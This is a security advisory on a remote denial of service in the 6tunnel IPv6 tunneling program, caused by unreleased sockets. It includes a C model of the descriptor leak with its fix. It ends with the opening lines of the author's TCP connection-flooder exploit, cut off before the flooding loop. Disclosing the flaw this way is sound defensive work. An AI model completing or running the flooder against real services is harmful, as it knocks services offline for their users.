6tunnel is a simple tunneling program for applications that do not speak IPv6. It is mostly used as an IRC proxy for clients without IPv6 support. A serious vulnerability in this program allows any user to crash 6tunnel remotely.
Credit:
The information has been provided by awayzzz.
Vulnerable systems:
6tunnel version 0.06
6tunnel version 0.07
6tunnel version 0.08
Immune systems:
6tunnel version 0.09
The socket that is opened whenever a client connects to 6tunnel is not correctly closed at the end of the connection. In some cases, when the connection is closed by the server (e.g. on IRC with a quit command), the socket is closed after a short timeout. However, if the socket is closed after a client disconnects, the socket remains in its CLOSE state until 6tunnel is either killed or stopped.
Therefore, flooding 6tunnel with connection requests, each followed by a disconnection, leaves a large number of sockets not fully closed. This will eventually cause 6tunnel to crash.
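The following is an added example, not 6tunnel's source and not part of the original advisory: a minimal model of a relay that fails to release its descriptors when the client hangs up first, next to the corrected form that closes both ends on every exit path. The names relay, leaked_after and open_fds are hypothetical, and socketpairs stand in for real TCP peers so the descriptor count can be measured inside one process.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

/* Count descriptors currently open in this process. */
static int open_fds(void)
{
    int n = 0;
    for (int fd = 0; fd < 1024; fd++)
        if (fcntl(fd, F_GETFD) != -1)
            n++;
    return n;
}

/* Hypothetical relay loop: copy client -> upstream until the client hangs up.
 * fixed == 0 models the flaw (nothing is released on client EOF);
 * fixed == 1 closes both descriptors on every exit path. */
static void relay(int client, int upstream, int fixed)
{
    char buf[512];
    ssize_t n;
    while ((n = read(client, buf, sizeof buf)) > 0)
        if (write(upstream, buf, (size_t)n) != n)
            break;
    if (fixed) {
        close(client);
        close(upstream);
    }
}

/* Run `cycles` connect/disconnect rounds over socketpairs (constructed
 * stand-ins for real TCP peers) and return how many descriptors leaked. */
int leaked_after(int cycles, int fixed)
{
    int before = open_fds();
    for (int i = 0; i < cycles; i++) {
        int c[2], u[2];   /* c[0] = remote client, c[1]/u[0] = tunnel, u[1] = server */
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, c) || socketpair(AF_UNIX, SOCK_STREAM, 0, u))
            return -1;
        close(c[0]);      /* client disconnects first */
        relay(c[1], u[0], fixed);
        close(u[1]);      /* remote server end goes away afterwards */
    }
    return open_fds() - before;
}

int main(void)
{
    printf("leaky: %d  fixed: %d\n", leaked_after(20, 0), leaked_after(20, 1));
    return 0;
}
```

In the flawed variant every short-lived connection costs the process two descriptors that are never returned, which is why the count is worth monitoring on any long-running relay.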
Exploit:
/*
 * ipv4/ipv6 tcp connection flooder.
 * Originally used as a DoS for 6tunnel (versions < 0.08).
 * Version 0.08 is a broken version. Please update to 0.09.
 *
 * Description of options:
 * -6 : flood an ipv6 address.
 * port : tcp port to flood (default: 667)
 * delay: delay between connections (ms).
 * times: max number of connections (default: 2500).
 *
 * awayzzz <awayzzz@digibel.org>
 * You can even find me @IRCnet if you need.
 */
#define DEFP 667 // default port.
#define DEFT 2500 // default number of connections.
#define TIME 100000 // delay between connections.
                    // tune it for best performances!
#define HAVE_IPV6
#define VALID_PORT(i) (i<65535 && i > 0)
int main(int argc,char *argv[])
{
    int ret, fd, i, ip6 = 0;
    int times = DEFT, port = DEFP, delay = TIME;
    struct sockaddr_in sin;